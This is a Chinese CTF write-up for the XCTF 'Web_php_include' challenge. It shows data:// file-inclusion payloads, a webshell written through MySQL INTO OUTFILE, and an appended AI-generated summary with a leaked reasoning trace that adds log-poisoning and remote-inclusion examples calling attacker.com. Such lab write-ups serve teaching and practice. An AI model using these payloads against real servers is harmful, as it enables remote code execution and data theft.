攻防世界Web_php_include详解

本文探讨了PHP中通过file://、php://和data://协议进行文件操作,以及利用getshell获取shell执行命令的方法。重点介绍了伪协议在CTF环境中的应用,包括允许URL包含和过滤,以及如何通过MySQL的文件操作绕过权限限制获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

两种思路:

第一种:文件包含

根据代码审计,对get类型参数进行循环过滤字符串'php://',所以考虑其他伪协议,伪协议包括:

【file://协议】

file:// 协议在双off的情况下也可以正常使用;

allow_url_fopen :off/on

allow_url_include:off/on

file:// 用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响。

使用方法:

file:// [文件的绝对路径和文件名]

【php://协议】

条件:

不需要开启allow_url_fopen,仅php://input、 php://stdin、 php://memory 和 php://temp 需要开启allow_url_include。

php://filter 读取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。

php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行。

【data://协议】

经过测试官方文档上存在一处问题,经过测试PHP版本5.2,5.3,5.5,7.0;data:// 协议是是受限于allow_url_fopen的,官方文档上给出的是NO,所以要使用data://协议需要满足双on条件

例子:

http://127.0.0.1/cmd.php?file=data://text/plain,<?php phpinfo()?>

or

http://127.0.0.1/cmd.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

其中进行base64编码可防止乱码问题

 由于file://协议用于本地系统,所以考虑用data://协议

 测试成功,接下来是利用阶段。

用echo $_SERVER['DOCUMENT_ROOT']; 先得到目录路径:

 然后用<?php print_r(scandir('/var/www')); ?>读取当前目录文件

看到 flag 文件了, 再用 file_get_contents 就可以读到里面的内容了:

<?php $a=file_get_contents('fl4gisisish3r3.php'); echo htmlspecialchars($a); ?>

 得到flag

第二种:getshell

第一步:咱们用御剑扫描后台发现phpmyadmin后台

 

第二步:写入一句话木马 select "<?php eval($_POST('x'));?>" into outfile '/tmp/yihua.php'

into outfile 语句用于把表数据导出到一个文本文件中,要想mysql用户对文件进行导入导出,首先要看指定的权限目录。mysql 新版本下secure_file_priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。
当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出;
当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下;
当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制。

 第三步:打开中国蚁剑输入url地址和密码,测试连接成功之后,添加:

部分内容转载自知乎:php伪协议实现命令执行的七种姿势 - 知乎

参考攻防世界中的writeup

<think>好的,我现在需要处理用户关于文件包含漏洞的查询,特别是与CTF比赛、攻防世界以及防御方法相关的内容。首先,我需要回忆文件包含漏洞的基础知识,包括它的类型(比如本地文件包含LFI和远程文件包含RFI)、常见触发场景,以及如何利用这些漏洞进行攻击。 接下来,用户提到了CTF习题和实战演练,所以我应该查找相关的CTF题目或平台,比如攻防世界(XCTF)、DVWA、sqli-labs等,是否有涉及文件包含的题目。例如,DVWA中的File Inclusion模块可能是一个常见的练习环境。同时,CTF比赛中可能通过包含特定文件获取flag,或者利用PHP的伪协议(如php://filter)来读取源代码。 然后,用户可能需要具体的漏洞利用步骤,比如如何通过参数传递恶意路径,或者利用日志文件注入代码。此外,防御方法也是关键,比如输入验证、禁用危险函数(allow_url_include)、设置白名单等。 需要注意的是,引用用户提供的参考资料中的内容,比如引用[5]提到的DVWA中的fi漏洞测试,以及引用[3]关于防御webshell的文件监控。同时,要确保回答结构清晰,分点列出漏洞原理、CTF例题、利用方式、防御措施,并生成相关问题。 最后,检查是否满足系统级指令:行内公式用$,独立公式用$$,正确的中文回答,生成相关问题,并正确添加引用标识。确保LaTeX语法正确,比如在提到数学表达式时正确使用$包裹。</think>### 文件包含漏洞详解 #### 一、漏洞原理 文件包含漏洞(File Inclusion)允许攻击者通过动态加载文件的功能(如PHP的`include`、`require`)注入恶意文件路径,分为两类: 1. **本地文件包含(LFI)**:包含服务器本地文件,例如: `http://example.com/index.php?page=../../etc/passwd` 2. **远程文件包含(RFI)**:包含远程服务器文件(需`allow_url_include=On`),例如: `http://example.com/index.php?page=http://attacker.com/shell.txt` #### 二、CTF例题与实战 1. **攻防世界(XCTF)例题** - 题目描述:通过文件包含读取`/flag`文件 - 解法:使用PHP伪协议`php://filter`读取源码 ```http http://target.com/?file=php://filter/convert.base64-encode/resource=flag.php ``` 解码Base64获取flag[^5][^1] 2. **DVWA实战(File Inclusion模块)** - 低安全级别下直接包含`file3.php`触发XSS漏洞[^5] - 高级别需绕过路径限制,例如: `http://192.168.20.48/DVWA/vulnerabilities/fi/?page=file:///var/log/apache2/access.log` #### 三、漏洞利用方式 1. **敏感文件读取** - Linux:`/etc/passwd`、`/proc/self/environ` - Windows:`C:\Windows\system.ini` 2. **日志文件注入** 修改User-Agent为PHP代码,包含日志文件执行命令: ```http GET /?page=/var/log/apache2/access.log HTTP/1.1 User-Agent: <?php system($_GET['cmd']);?> ``` 3. **PHP伪协议利用** - `php://input`:直接执行POST数据 - `data://text/plain,<?php phpinfo();?>` #### 四、防御方法 1. **输入验证** 使用白名单限制包含的文件名,例如: ```php $allowed = ['home.php', 'about.php']; if (in_array($_GET['page'], $allowed)) { include($_GET['page']); } ``` 2. **禁用危险配置** - 设置`allow_url_include=Off` - 关闭错误回显(`display_errors=Off`) 3. **文件监控** 对Web目录实时监控,异常修改立即恢复[^3]
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值